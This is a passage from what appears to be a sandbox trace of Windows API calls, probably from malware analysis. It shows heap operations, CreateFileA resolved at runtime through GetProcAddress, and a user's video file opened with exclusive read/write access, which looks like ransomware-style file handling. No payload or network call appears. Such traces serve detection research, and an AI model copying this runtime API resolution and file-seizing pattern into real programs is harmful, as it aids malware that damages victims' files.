(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.647] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.650] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd888 [0198.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd888, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.650] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0198.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0198.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd888, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0198.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.651] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0198.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0198.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0198.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x36) returned 0x90ad98 [0198.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", cchWideChar=54, lpMultiByteStr=0x90ad98, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", lpUsedDefaultChar=0x0) returned 54 [0198.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.652] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z4iuj36y_urj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0198.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=54, lpWideCharStr=0x906f38, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv") returned 54 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.655] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: 